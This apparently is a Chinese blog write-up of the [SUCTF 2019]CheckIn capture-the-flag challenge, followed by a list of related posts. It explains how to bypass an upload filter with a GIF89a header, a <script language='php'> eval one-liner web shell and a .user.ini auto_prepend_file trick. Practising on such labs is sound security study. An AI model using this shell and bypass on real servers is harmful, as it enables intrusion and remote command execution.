web第25题
[SUCTF 2019]CheckIn

打开靶场

看来是一个文件上传的题
上传正常图片

返回路径，注意到有一个index.php
尝试直接上传一句话木马shell.php

提示非法后缀
尝试使用burp抓包修改后缀


经过测试，基本都被过滤了，尝试上传.htaccess文件

得到提示，看来使用了exif_imagetype函数来检查是否是图片文件
在木马中加上GIF89a进行图片文件欺骗

尝试上传

看来对文件内容进行了检查，不允许有<?
参考我做的另一道题的绕过方法buuctf初学者学习记录–web第9题
换一个一句话木马

<script language="php">eval($_POST['shell']);</script>

ps：根据经验，一般flag都放在根目录下，可以将一句话木马直接改成<script language='php'>system('cat /flag');</script>，此时访问index.php就会直接列出flag，这里没这么做

进行上传

上传成功，并且提示目录下有123.gif,index.php
但是由于.htaccess文件不允许上传，无法将gif文件解析为php文件
经过查找，参考：.user.ini文件构成的PHP后门
官方文档的解释如下：

下图引用于另一位大佬的解释：原文链接

得到.user.ini文件可以达到此效果，并且甚至可以比.htaccess文件用途更广
参考上面的连接，编写.user.ini文件

这句代码的意思是，指定123.gif文件每次都包含在要执行的php文件前，前提是目录下有.php文件。上文中提到了目录下有index.php文件，那么满足条件，只要访问index.php，那么123.gif文件的代码都会先执行
尝试上传

额。我忘了还有这个函数，在文件前添加GIF89a然后上传

上传成功
可以看到目录下的3个文件，这时，访问index.php就会将123.gif中的代码包含进去，使得其成为一个shell脚本
此时用蚁剑无法连接，不知道为啥，既然知道路径，那就直接使用post提交命令scandir扫描根目录，一般flag都放在根目录

看到根目录下有flag文件，直接用file_get_contents函数进行读取，得到flag

[SUCTF 2019]CheckIn相关推荐

1. [SUCTF 2019] SignIn

   [SUCTF 2019] SignIn 如果对本文存在有疑问或需要工具可以在下方给我留言! 这题比较简单 题目下载地址:https://www.lanzoux.com/iawzl2f 程序没有加壳,直 ...

2. [SUCTF 2019]Game

   [SUCTF 2019]Game 题目地址 : https://buuoj.cn/challenges#[SUCTF%202019]Game 题目一共两个附件,先把src.zip 解压,在src目录下 ...

3. web buuctf [SUCTF 2019]Pythonginx1

   知识点:1.nignx 2.idna编码与utf-8编码的漏洞 1.开题 查看源码,整理代码: @app.route('/getUrl', methods=['GET', 'POST']) def g ...

4. BUUCTF：[SUCTF 2019]Game

   https://buuoj.cn/challenges#[SUCTF%202019]Game index.html中发现一串base32 >>> import base64 > ...

5. BUUCTF-WEB：[SUCTF 2019]EasySQL 1

   解题思路: ①先试试1'# 发现没有回显 ②试试1  有回显 ③试试单引号注入 ④试试用order by查询表的列数:1 order by 1 用不了联合注入了! 下面尝试使用堆叠注入: payloa ...

6. [SUCTF 2019]EasySQL1

   1.老规矩,先输入1 2.输入1 or 1,页面提示nonono,说明or已被列入黑名单,通过我们尝试,and,union等等都被列入黑名单. 3.我们来判断参数是否被引号,双引号,括号包裹. 输入1 ...

7. [SUCTF 2019]EasySQL1 (buu一周目速通)

   进入靶机,根据题目是一道sql注入题目,经过普通手段注入发现大部分关键词都被过滤了, Array ( [0] => 1 ) 一解:发现输入数字回显代码,字母不回显,所以猜测后台代码存在 ||(或 ...

8. BUUctf刷题第三天

   [极客大挑战 2019]BuyFlag 进去是一个网页,查看源代码 说只有啥玩意的学生才能买,就抓包看看 发现cookie后面有个user=0,改成一试试 改完后说我是啥啥啥的学生了可以支付购买了 结 ...

9. buuctf web1

   目录 [极客大挑战 2019]EasySQL [HCTF 2018]WarmUp [极客大挑战 2019]Havefun [ACTF2020 新生赛]Include [强网杯 2019]随便注 [SU ...

最新文章

1. linux网站配置文件,Linux网站服务器配置文件
2. 从数据中心三大趋势看如何做布线规划
3. Tkinter中常用的函数
4. 再查ReactOS项目
5. 【Get 以太坊技能】CentOS 7 Geth安装
6. mongodb如何快速进行版本升级
7. react组件之间重用状态
8. 安卓9.0官方系统升级包_华为、荣耀公布可升级安卓10.0机型，你的手机在名单之内吗？...
9. C# 中打印、预览、打印机设置和打印属性的方法
10. 原生态HTML文件上传与下载
11. AcWing：3.完全背包问题
12. （补）20200105：整数转罗马数字
13. win10程序员计算器中HEX、DEC、OCT和BIN的含义
14. 嵌入式课程 之 陀螺仪传感器实验
15. 怎样保存html视频,网页上的视频怎么保存到电脑 网页视频保存到电脑的步骤教程...
16. Win10上轻松安装docker，更改镜像安装目录
17. 运筹学--线性目标规划
18. 通过枚举法暴力破解6位数以内zip密码压缩包，使用pyzipper包：内嵌生成1-6位数字加密码所有组合函数
19. Lightweight Single-Image Super-Resolution Network with Attentive Auxiliary Feature Learning
20. ASP内置对象及其作用

热门文章

1. SQL server 2008R2 入门
2. 如何在NLP领域做成一件事by周明ACL计算语言学会候任主席(附PDF公号发“NLP做事”下载rar讲座PPT等10文件)...
3. 获取cookies（pyppeteer）
4. 连接Mysql提示Can’t connect to local MySQL server through socket的解决方法
5. 初学Java 从0-1创建Spring boot+Mybatis - plus+Swagger2+Mysql（代码生成器）
6. ubuntu 16.04 内存清理方法总结
7. 从阿里云下载centos的步骤
8. 杂谈：渐进增强与优雅降级
9. 九峰影业创始人_以终为始 逐梦青春——九峰实验学校2020届高三毕业典礼
10. 中国科学技术大学计算机研究生在哪个校区,中国科学技术大学有几个校区及校区地址 哪个校区最好...